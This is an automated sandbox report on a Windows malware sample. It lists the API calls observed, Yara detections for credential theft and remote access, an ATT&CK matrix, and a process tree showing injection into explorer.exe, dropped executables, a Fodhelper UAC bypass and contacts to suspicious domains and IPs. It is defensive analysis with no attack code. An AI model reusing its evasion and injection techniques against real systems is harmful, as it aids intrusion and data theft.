                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_004082B6 CheckTokenMembership,AllocateAndInitializeSid,FreeSid
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1530927276.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanq
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: _LcidFromHexString,GetLocaleInfoA,1_2_0041F653
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,1_2_0041FA79
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,1_2_0041FA12
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,1_2_0041F6FA
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,1_2_0041FAB5
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0041F55E
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0041F926
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedDecrement,GetAtomNameW,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsA,GetStartupInfoA,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessWorkingSetSize,1_2_00416FD0
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: EnumSystemLocalesA,1_2_0041F9E9
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: _LcidFromHexString,GetLocaleInfoA,6_2_0041F653
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: _GetPrimaryLen,EnumSystemLocalesA,6_2_0041FA79
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: _GetPrimaryLen,EnumSystemLocalesA,6_2_0041FA12
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: GetLocaleInfoW,_GetPrimaryLen,6_2_0041F6FA
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,6_2_0041FAB5
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0041F55E
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_0041F926
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedDecrement,GetAtomNameW,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsA,GetStartupInfoA,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessWorkingSetSize,6_2_00416FD0
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: EnumSystemLocalesA,6_2_0041F9E9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_0040DC53
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E079
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E012
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_0040DCFA
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_0040E0B5
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_0040DD55
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetLocaleInfoA,7_2_00411109
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040B1BE
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_0040A244
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040AED0
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_004092EC
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,7_2_00404EB4
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0040DB5E
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,7_2_005CBB00
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_0040DF26
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,7_2_0040B72B
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_004093C6
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,7_2_00410FD4
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: EnumSystemLocalesA,7_2_0040DFE8
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BB62.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00416F60 FreeEnvironmentStringsW,CreateNamedPipeW,FileTimeToLocalFileTime,1_2_00416F60
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CBF60 GetSystemTimes,GetSystemTimes,FlushFileBuffers,GetVolumeInformationW,FlushFileBuffers,GetVolumeInformationW,7_2_005CBF60
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: dump.pcap, type: PCAP

                  ATT&CK Matrix

                  Techniques are listed per tactic column; a number in parentheses is the count the report attaches to that technique.

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations; Business Relationships
                  Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server; Server
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship
                  Execution: Windows Management Instrumentation (21); Native API (3); Exploitation for Client Execution (1); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic
                  Persistence: Scripting (1); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Bootkit (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                  Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (513); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                  Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1); File Deletion (1); Masquerading (111); Virtualization/Sandbox Evasion (261); Access Token Manipulation (1); Process Injection (513); Hidden Files and Directories (1); Regsvr32 (1); Bootkit (1)
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                  Discovery: System Time Discovery (1); File and Directory Discovery (1); System Information Discovery (35); Query Registry (1); Security Software Discovery (561); Virtualization/Sandbox Evasion (261); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (2); Remote System Discovery (1); System Network Connections Discovery; Process Discovery; Permission Groups Discovery; Local Groups
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
                  Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection
                  Command and Control: Ingress Tool Transfer (13); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (4); Application Layer Protocol (125); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port
                  Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service; Direct Network Flood

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1389368 | Sample: ccQGH1mKws.exe | Start date: 08/02/2024 | Architecture: WINDOWS | Score: 100

                  Start
                    DNS/IP: b04rd.xyz; relay.lsoccaz.b04rd.xyz (Performs DNS queries to domains with low reputation); 338 other IPs or domains
                    Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                    Started: ccQGH1mKws.exe; afratej; svchost.exe; 2 other processes

                  ccQGH1mKws.exe (started by Start)
                    Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Creates a thread in another existing process (thread injection)
                    Injected: explorer.exe 92 26

                  afratej (started by Start)
                    Signatures: Multi AV Scanner detection for dropped file; Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)

                  svchost.exe (started by Start)
                    Started: WerFault.exe

                  explorer.exe (injected by ccQGH1mKws.exe)
                    DNS/IP: winoui.com; my.account.sony.com; 7 other IPs or domains
                    Dropped: C:\Users\user\AppData\Roaming\vfratej, PE32; C:\Users\user\AppData\Roaming\afratej, PE32; C:\Users\user\AppData\Local\Temp33F.exe, PE32; 9 other malicious files
                    Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Started: A6A0.exe; BB62.exe; DC49.exe; 5 other processes

                  A6A0.exe (started by explorer.exe)
                    Dropped: C:\Users\user\AppData\Local\Temp\...\A6A0.tmp, PE32
                    Started: A6A0.tmp
                      A6A0.tmp: Started: A6A0.exe
                        A6A0.exe: Dropped: C:\Users\user\AppData\Local\Temp\...\A6A0.tmp, PE32; Started: A6A0.tmp
                          A6A0.tmp: Dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32; C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32; 31 other files (28 malicious); Started: anyburnfree.exe; anyburnfree.exe
                            anyburnfree.exe (first instance): Dropped: C:\ProgramData\...\IMAP List Mailboxes 65.exe, PE32
                            anyburnfree.exe (second instance): DNS/IP: 185.196.8.22 SIMPLECARRER2IT Switzerland; 88.80.145.14 GWHOSTRO Bulgaria; 6 other IPs or domains

                  BB62.exe (started by explorer.exe)
                    Dropped: C:\Users\user\AppData\...\InstallSetup4.exe, PE32; C:\Users\user\AppData\Local\...\FourthX.exe, PE32+; C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32
                    Signatures: Multi AV Scanner detection for dropped file
                    Started: InstallSetup4.exe; 288c47bbc1871b439df19ff4df68f076.exe; FourthX.exe
                      InstallSetup4.exe: DNS/IP: 185.172.128.90 NADYMSS-ASRU Russian Federation; 5.42.64.33 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation; 185.172.128.127 NADYMSS-ASRU Russian Federation
                        Dropped: C:\Users\user\AppData\Local\...\nsfDE87.tmp, PE32; C:\Users\user\AppData\Local\...\INetC.dll, PE32; C:\Users\user\AppData\...\BroomSetup.exe, PE32; C:\Users\user\AppData\...\syncUpd[1].exe, PE32
                        Signatures: Multi AV Scanner detection for dropped file
                        Started: BroomSetup.exe
                          BroomSetup.exe: Signatures: Multi AV Scanner detection for dropped file; Started: cmd.exe
                            cmd.exe: Started: conhost.exe; chcp.com
                      288c47bbc1871b439df19ff4df68f076.exe: Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); UAC bypass detected (Fodhelper)
                      FourthX.exe: Signatures: Suspicious powershell command line found; Started: powershell.exe
                        powershell.exe: Started: FourthX.exe; conhost.exe
                          FourthX.exe: Dropped: C:\ProgramData\...\vueqjgslwynd.exe, PE32+

                  DC49.exe (started by explorer.exe)
                    Signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 2 other signatures

                  5 other processes (started by explorer.exe)
                    DNS/IP: 104.21.83.220 CLOUDFLARENETUS United States; 172.67.152.52, 443, 49716 CLOUDFLARENETUS United States; 3 other IPs or domains
                    Signatures: Machine Learning detection for dropped file; Contains functionality to infect the boot sector; Contains functionality to inject code into remote processes; 2 other signatures
                    Started: regsvr32.exe; 8837.exe 3 16; WerFault.exe; csrss.exe
                      regsvr32.exe: Signatures: Tries to detect sandboxes / dynamic malware analysis system (file name check)
                      8837.exe: DNS/IP: 86.59.21.38 UTA-ASAT Austria; 124.168.18.172 TPG-INTERNET-APTPGTelecomLimitedAU Australia; 38 other IPs or domains; Dropped: C:\ProgramData\Drivers\csrss.exe, PE32
